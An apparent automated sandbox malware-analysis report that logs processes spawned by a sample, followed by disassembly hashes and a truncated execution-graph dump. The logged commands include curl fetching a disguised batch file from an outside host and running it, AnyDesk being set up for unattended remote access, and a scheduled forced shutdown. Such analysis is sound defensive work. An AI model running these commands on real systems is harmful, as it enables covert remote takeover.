                                                                                                                                                                  General

                                                                                                                                                                  Target ID:43
                                                                                                                                                                  Start time:01:54:02
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\Trays\4t-min64.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Intel\Trays\4t-min64.exe" "C:\Intel\Trays\ShellEh6055x64.dll"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:275'968 bytes
                                                                                                                                                                  MD5 hash:7BC3AEEDC18717D796F1C7FF8DBF0C17
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:44
                                                                                                                                                                  Start time:01:54:02
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Intel\svchost.exe" --local-service
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:5'331'456 bytes
                                                                                                                                                                  MD5 hash:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:45
                                                                                                                                                                  Start time:01:54:03
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Intel\svchost.exe" --local-control
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:5'331'456 bytes
                                                                                                                                                                  MD5 hash:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:47
                                                                                                                                                                  Start time:01:54:07
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Intel\AnyDesk\AnyDesk.exe" --service
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:5'331'456 bytes
                                                                                                                                                                  MD5 hash:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                  • Detection: 50%, ReversingLabs
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:48
                                                                                                                                                                  Start time:01:54:10
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Intel\AnyDesk\AnyDesk.exe" --control
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:5'331'456 bytes
                                                                                                                                                                  MD5 hash:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:49
                                                                                                                                                                  Start time:01:54:10
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Intel\AnyDesk\AnyDesk.exe" --new-install
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:5'331'456 bytes
                                                                                                                                                                  MD5 hash:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:50
                                                                                                                                                                  Start time:01:54:12
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\curl.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg
                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                  File size:1'793'024 bytes
                                                                                                                                                                  MD5 hash:9542F4AC0CAEFA766BD67BA879ED2DD4
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:51
                                                                                                                                                                  Start time:01:54:13
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" "
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:52
                                                                                                                                                                  Start time:01:54:13
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo QWERTY1234566 "
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:53
                                                                                                                                                                  Start time:01:54:13
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:AnyDesk.exe --set-password _unattended_access
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:5'331'456 bytes
                                                                                                                                                                  MD5 hash:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:54
                                                                                                                                                                  Start time:01:54:13
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Intel\AnyDesk\AnyDesk.exe" --crash-handler
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:5'331'456 bytes
                                                                                                                                                                  MD5 hash:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:55
                                                                                                                                                                  Start time:01:54:15
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\dc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\dc.exe /D
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:831'888 bytes
                                                                                                                                                                  MD5 hash:139464919440E93E49C80CC890B90585
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 50%, ReversingLabs
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:56
                                                                                                                                                                  Start time:01:54:16
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                  Imagebase:0x7ff644650000
                                                                                                                                                                  File size:57'360 bytes
                                                                                                                                                                  MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:57
                                                                                                                                                                  Start time:01:54:16
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
                                                                                                                                                                  Imagebase:0x7ff644650000
                                                                                                                                                                  File size:57'360 bytes
                                                                                                                                                                  MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:58
                                                                                                                                                                  Start time:01:54:16
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                  Imagebase:0x7ff644650000
                                                                                                                                                                  File size:57'360 bytes
                                                                                                                                                                  MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:59
                                                                                                                                                                  Start time:01:54:16
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                  Imagebase:0x7ff644650000
                                                                                                                                                                  File size:57'360 bytes
                                                                                                                                                                  MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:60
                                                                                                                                                                  Start time:01:54:16
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\dc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Intel\dc.exe" /SYS 1
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:831'888 bytes
                                                                                                                                                                  MD5 hash:139464919440E93E49C80CC890B90585
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:61
                                                                                                                                                                  Start time:01:54:18
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
                                                                                                                                                                  Imagebase:0x7ff644650000
                                                                                                                                                                  File size:57'360 bytes
                                                                                                                                                                  MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:62
                                                                                                                                                                  Start time:01:54:20
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
                                                                                                                                                                  Imagebase:0xe0000
                                                                                                                                                                  File size:78'336 bytes
                                                                                                                                                                  MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:63
                                                                                                                                                                  Start time:01:54:20
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:powercfg -change -standby-timeout-ac 0
                                                                                                                                                                  Imagebase:0xe0000
                                                                                                                                                                  File size:78'336 bytes
                                                                                                                                                                  MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:64
                                                                                                                                                                  Start time:01:54:20
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:powercfg -change -hibernate-timeout-ac 0
                                                                                                                                                                  Imagebase:0xe0000
                                                                                                                                                                  File size:78'336 bytes
                                                                                                                                                                  MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:65
                                                                                                                                                                  Start time:01:54:20
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:powercfg -h off
                                                                                                                                                                  Imagebase:0xe0000
                                                                                                                                                                  File size:78'336 bytes
                                                                                                                                                                  MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:66
                                                                                                                                                                  Start time:01:54:20
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
                                                                                                                                                                  Imagebase:0xe0000
                                                                                                                                                                  File size:78'336 bytes
                                                                                                                                                                  MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:67
                                                                                                                                                                  Start time:01:54:20
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
                                                                                                                                                                  Imagebase:0xe0000
                                                                                                                                                                  File size:78'336 bytes
                                                                                                                                                                  MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:68
                                                                                                                                                                  Start time:01:54:20
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00
                                                                                                                                                                  Imagebase:0x860000
                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                  MD5 hash:478BEAEC1C3A9417272BC8964ADD1CEE
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:69
                                                                                                                                                                  Start time:01:54:20
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:Powershell.exe -executionpolicy remotesigned -File C:\Intel\AnyDesk\wol.ps1
                                                                                                                                                                  Imagebase:0xc00000
                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:70
                                                                                                                                                                  Start time:01:54:21
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\shutdown.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\shutdown.EXE /s /f /t 0
                                                                                                                                                                  Imagebase:0x7ff7d4500000
                                                                                                                                                                  File size:28'160 bytes
                                                                                                                                                                  MD5 hash:F2A4E18DA72BB2C5B21076A5DE382A20
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:71
                                                                                                                                                                  Start time:01:54:21
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:72
                                                                                                                                                                  Start time:01:54:23
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                                                                                                                                                  Imagebase:0x7ff6e5540000
                                                                                                                                                                  File size:3'379'080 bytes
                                                                                                                                                                  MD5 hash:40AAE14A5C86EA857FA6E5FED689C48E
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 02200CE2 Relevance: 2.8, Strings: 1, Instructions: 1584COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000003.20236777918.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2200000_Yv24LkKBY6.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 131
                                                                                                                                                                    • API String ID: 0-23763599
                                                                                                                                                                    • Opcode ID: a3dd21933895f40c9cac9e053dfcc2cc45cfa44c168e575c08093881d2340219
                                                                                                                                                                    • Instruction ID: 98bec702eb823322df3e30a86d2abe90eb709f54d41ed18ca2b35327dfd68b8b
                                                                                                                                                                    • Opcode Fuzzy Hash: a3dd21933895f40c9cac9e053dfcc2cc45cfa44c168e575c08093881d2340219
                                                                                                                                                                    • Instruction Fuzzy Hash: 0BA2FE928AE3D25FC3135BB05C695A17FB99E1722930E01EBD4D2DF0A3D18D099AD732
                                                                                                                                                                    Function 02201679 Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000003.20236777918.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2200000_Yv24LkKBY6.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 525a5cb4b8b8404ad13e4b3e6f6e4abd4f7846433c6eb762c95a5247ff3e4dfd
                                                                                                                                                                    • Instruction ID: 0060ef3173f77af72b6f1d8a9d60576cc1ceafea12b6f34d5bc8018e134a24f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 525a5cb4b8b8404ad13e4b3e6f6e4abd4f7846433c6eb762c95a5247ff3e4dfd
                                                                                                                                                                    • Instruction Fuzzy Hash: 75A12DA146E3D28FC7178BB08CA16913FB1AE1725435E04DBC0C4CF0B7E29D995ADB22

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:1.6%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:3.4%
                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                    Total number of Limit Nodes:80
                                                                                                                                                                    execution_graph 118052 1d5478 118055 1d5496 118052->118055 118053 1d552a 118088 1e8cb0 118053->118088 118055->118053 118057 1d54ae 118055->118057 118056 1d5536 118060 1d5577 118056->118060 118197 1e9880 83 API calls 118056->118197 118196 1d6710 GetTickCount64 118057->118196 118061 1d55a1 118060->118061 118063 1d5590 118060->118063 118198 1dcac0 118061->118198 118064 1d5604 118063->118064 118065 1d5610 118063->118065 118072 1d4bb0 118063->118072 118213 1d6710 GetTickCount64 118064->118213 118214 1d67d0 GetTickCount64 118065->118214 118069 1d5619 118071 1d568e 118069->118071 118073 1d562c 118069->118073 118077 1dcac0 120 API calls 118071->118077 118074 1d58b9 118072->118074 118078 1d58ac 118072->118078 118083 1d4c4a 118072->118083 118130 1e6210 GetTickCount64 118072->118130 118181 1d3850 118072->118181 118217 1d67d0 GetTickCount64 118072->118217 118218 1d9330 113 API calls 118072->118218 118073->118072 118082 1d563c 118073->118082 118219 1d3960 83 API calls 118074->118219 118080 1d56d5 118077->118080 118080->118072 118085 1d56e2 118080->118085 118215 1e94e0 84 API calls 118082->118215 118083->118072 118087 1d3960 83 API calls 118083->118087 118195 1dcfe0 GetTickCount64 118083->118195 118216 1e94e0 84 API calls 118085->118216 118087->118083 118089 1e8ced 118088->118089 118090 1e8d1b 118089->118090 118220 1df690 118089->118220 118092 1e8d29 118090->118092 118093 1e8d44 118090->118093 118253 1d3960 83 API calls 118092->118253 118095 1e8d86 118093->118095 118098 1e8d5b 118093->118098 118096 1e8dae GetTickCount64 118095->118096 118255 1e8810 89 API calls 118095->118255 118103 1e8dc4 118096->118103 118097 1e8d34 118097->118056 118254 1e7dc0 90 API calls 118098->118254 118100 1e8d6f 118100->118095 118117 1e8fba 118100->118117 118102 1e8da3 118102->118096 118102->118117 118105 1d3850 83 API calls 118103->118105 118107 1e8de3 118103->118107 118104 1e6210 89 API calls 118106 1e8e66 118104->118106 118105->118107 118106->118117 118256 1ee5c0 84 API calls 118106->118256 118107->118104 118109 1e8e7b 118110 1e8e92 118109->118110 118114 1e8f30 118109->118114 118109->118117 118257 1dcfe0 GetTickCount64 118110->118257 118111 1e8fb3 118113 1e6210 89 API calls 118111->118113 118113->118117 118114->118111 118115 1e8f80 118114->118115 118118 1e8f5f 118114->118118 118115->118111 118122 1e8f98 118115->118122 118116 1e8e9d 118116->118117 118119 1e8eb6 118116->118119 118120 1e8ef4 118116->118120 118117->118056 118260 1d3960 83 API calls 118118->118260 118258 1d3960 83 API calls 118119->118258 118259 1d3960 83 API calls 118120->118259 118261 1d3960 83 API calls 118122->118261 118123 1e8f70 118123->118056 118126 1e8fa3 118126->118056 118128 1e8ee4 118128->118056 118129 1e8f20 118129->118056 118131 1e6283 118130->118131 118270 2dbee3 59 API calls 118131->118270 118133 1e62d9 118271 2dbee3 59 API calls 118133->118271 118135 1e6322 118272 2dbee3 59 API calls 118135->118272 118137 1e6a79 118138 2be5e7 6 API calls 118137->118138 118141 1e6a8f 118138->118141 118139 1e64fd 118142 1e6549 118139->118142 118274 1d3960 83 API calls 118139->118274 118140 1e6563 118145 1e660f 118140->118145 118153 1e6571 118140->118153 118141->118072 118143 2be5e7 6 API calls 118142->118143 118147 1e655f 118143->118147 118144 1e6642 118149 1cf8e0 83 API calls 118144->118149 118145->118137 118145->118144 118157 1e6655 118145->118157 118276 1cf8e0 118145->118276 118147->118072 118149->118157 118150 1e6485 118150->118137 118150->118139 118150->118140 118151 1e6367 118151->118150 118273 2dbee3 59 API calls 118151->118273 118153->118142 118154 1e65ea 118153->118154 118275 1d3960 83 API calls 118154->118275 118279 1e5bf0 83 API calls 118157->118279 118158 1e65f5 118160 2be5e7 6 API calls 118158->118160 118159 1e6890 118280 1e5bf0 83 API calls 118159->118280 118162 1e660b 118160->118162 118162->118072 118163 1e689e 118281 1e5bf0 83 API calls 118163->118281 118166 1e699d 118283 1e5d60 83 API calls 118166->118283 118168 1e68b2 118282 1e5d60 83 API calls 118168->118282 118169 1e69d1 118284 1e5d60 83 API calls 118169->118284 118171 1e69ee 118285 1e5d60 83 API calls 118171->118285 118173 1e6a0a 118286 1e5d60 83 API calls 118173->118286 118175 1e6a2f 118287 1e5d60 83 API calls 118175->118287 118177 1e6a49 118178 1cf8e0 83 API calls 118177->118178 118179 1e6a6b 118178->118179 118288 2c1072 84 API calls 118179->118288 118182 1d3875 118181->118182 118194 1d3945 118181->118194 118184 1cec90 83 API calls 118182->118184 118182->118194 118183 2be5e7 6 API calls 118185 1d3958 118183->118185 118186 1d38b7 118184->118186 118185->118072 118187 1d391e 118186->118187 118188 1d38f3 118186->118188 118312 2bfc7d 118187->118312 118191 2be5e7 6 API calls 118188->118191 118190 1d3932 118192 2bfc7d 80 API calls 118190->118192 118193 1d3917 118191->118193 118192->118194 118193->118072 118194->118183 118195->118083 118196->118083 118197->118060 118199 1dcad6 118198->118199 118201 1dcadd 118198->118201 118199->118072 118201->118199 118673 1df0b0 6 API calls 118201->118673 118202 1dcb5a 118203 1dcb61 118202->118203 118205 1dcba8 118202->118205 118668 1e5f40 118202->118668 118203->118202 118206 1dcc46 118205->118206 118208 1dcbfc 118205->118208 118675 1d9330 113 API calls 118206->118675 118674 1d9df0 114 API calls 118208->118674 118210 1dcc35 118210->118072 118211 1dcc05 118211->118210 118212 1d3850 83 API calls 118211->118212 118212->118210 118213->118065 118214->118069 118215->118083 118216->118083 118217->118072 118218->118072 118219->118078 118221 1df725 118220->118221 118222 1df6d5 118220->118222 118223 1df729 GetTickCount64 118221->118223 118229 1df75d 118221->118229 118222->118221 118224 1df6de 118222->118224 118240 1df743 118223->118240 118225 1df70e 118224->118225 118226 1df6e4 WSASetLastError 118224->118226 118227 1df707 Sleep 118224->118227 118228 2be5e7 6 API calls 118225->118228 118230 1df6ef 118226->118230 118227->118225 118231 1df721 118228->118231 118229->118230 118234 